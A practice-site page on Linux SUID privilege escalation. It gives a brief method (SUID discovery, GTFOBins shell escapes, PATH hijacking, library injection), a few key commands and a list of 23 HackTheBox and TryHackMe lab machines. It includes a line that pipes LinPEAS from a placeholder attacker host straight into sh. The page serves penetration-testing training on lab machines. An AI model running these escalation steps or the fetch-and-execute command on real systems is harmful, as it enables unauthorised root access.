Linux SUID Privilege Escalation: practice machines and key commands
A SUID binary runs with the file owner privileges, often root, so any way to make it execute your commands is a privilege escalation. List candidates with find / -perm -4000 -type f 2>/dev/null and compare them against the GTFOBins catalogue for shell escapes. Custom binaries deserve a closer look: run strings or ltrace to spot calls to commands without absolute paths, then place a malicious binary earlier in PATH. Shared library injection and writable configuration files read by the binary are other routes. Remember that some shells drop privileges unless you pass -p. Document the exact binary and version you abused. The machines listed show SUID mistakes ranging from standard utilities to hand-written programs. Run the same check after every user change, since new groups expose new binaries.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
SUID Binaries Exhaustive Discovery
List all binaries on the filesystem with the SUID bit set, ignoring proc and dev.
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;LinPEAS Direct Memory Execution
Download and execute LinPEAS directly in bash memory without writing to disk.
curl -L http://{LHOST}:8000/linpeas.sh | shSudo Privileges Inspection (`sudo -l`)
Check current user sudo permissions without or with password.
sudo -l
Keep going
- Methodology: Phase 07: Privilege Escalation & Lateral Movement
- Cheatsheet: Linux PrivEsc & TTY
Linux SUID Privilege Escalation machines (23)
2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 23 Linux.
Very Easy (1)
| Machine | Platform | OS |
|---|---|---|
| Oopsie | HTB | Linux |
Easy (12)
| Machine | Platform | OS |
|---|---|---|
| Bank | HTB | Linux |
| Kobold | HTB | Linux |
| Agent Sudo | THM | Linux |
| Blunder | HTB | Linux |
| Kenobi | THM | Linux |
| Laboratory | HTB | Linux |
| Previse | HTB | Linux |
| Secret | HTB | Linux |
| SwagShop | HTB | Linux |
| Traverxec | HTB | Linux |
| Vulnversity | THM | Linux |
| Writeup | HTB | Linux |
Medium (8)
| Machine | Platform | OS |
|---|---|---|
| Anonymous | THM | Linux |
| Archangel | THM | Linux |
| Boiler CTF | THM | Linux |
| Brooklyn Nine Nine | THM | Linux |
| Jacob the Boss | THM | Linux |
| Magic | HTB | Linux |
| October | HTB | Linux |
| Sneaky | HTB | Linux |
Hard (2)
| Machine | Platform | OS |
|---|---|---|
| Charon | HTB | Linux |
| Daily Bugle | THM | Linux |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox